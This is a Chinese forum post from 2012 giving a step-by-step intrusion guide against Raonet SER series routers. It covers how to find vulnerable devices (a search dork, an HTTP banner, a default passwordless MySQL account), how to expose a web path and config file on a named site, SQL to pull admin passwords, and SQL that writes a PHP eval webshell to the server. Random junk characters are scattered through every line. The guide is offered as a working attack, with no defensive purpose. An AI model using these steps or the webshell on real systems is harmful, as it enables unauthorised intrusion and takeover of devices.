寻找存在漏洞的路由器方法:* h! _* p6 j0 I; g5 j5 Y T4 b
) K( r, p% v+ a6 y1:google搜索'Raonet Subscriber Ethernet Router'3 z" C2 J* n7 |' a S y9 M# T
; K2 W; U. Y, Q( `- l( Q% X
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
, J" h3 B4 |- R( M" A3 y
6 r6 o b$ w' \+ C u r5 i3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。# s* o- Y8 e* A. R: T8 g! b4 l" R: y
1 g0 {4 ]/ J' ~7 \7 K" \. E//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
2 T+ V1 l) F! H7 X/ l5 h H4 d7 a) j* m3 S
3 ?$ r: r) n8 h- t. Y0 Z$ R: `3 p. O# L+ D
入侵步骤:9 V& X8 n# S/ f0 M
0 `/ z& `; {! b9 r; i: g d1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php+ b- U: [! U4 g" q1 D
' N, o; N2 g4 L2 E3 u
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc) V) a& [. k) n7 e% f7 Z7 O9 W
3:得到密码后连接,查看GUI管理密码:
4 z+ P! k* E8 i; E* ^! h/ guse ser_500
: B1 X$ X+ ]: a0 x7 Z! l" Dselect id,passwd from user;
+ i# R: U. j: m# B1 ?, I4:通过数据库写入webshell,执行命令:% x: n f. T3 D. f/ [
use mysql;! ]1 Z" ~. ]6 e: h$ @( v2 U1 p
create table ok(cmd TEXT);- D9 F1 c; f( y: Z6 J
insert into ok values("<?php @eval($_POST[cmd])?>");
/ Q9 H9 N2 N/ E3 p5 ?select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";: \7 l, d% F5 s' P0 z- w0 `7 U
drop table ok;
& K0 N& q" U" N6 ?; O3 ]: g8 I. |2 Y9 \' m% y" n% ?) o8 C
5:连接后门shell.php 9 {# o/ }' ^: N
5 i# e& L0 q: b* @) f& a% e2 ]; Z6. 搞定!
# @4 [( o! o1 z( T8 s7 M9 p! J% B/ e2 \ _; i; p, K1 t' M/ T9 M
|
发表于 2012-12-10 10:30:18
收藏
支持
反对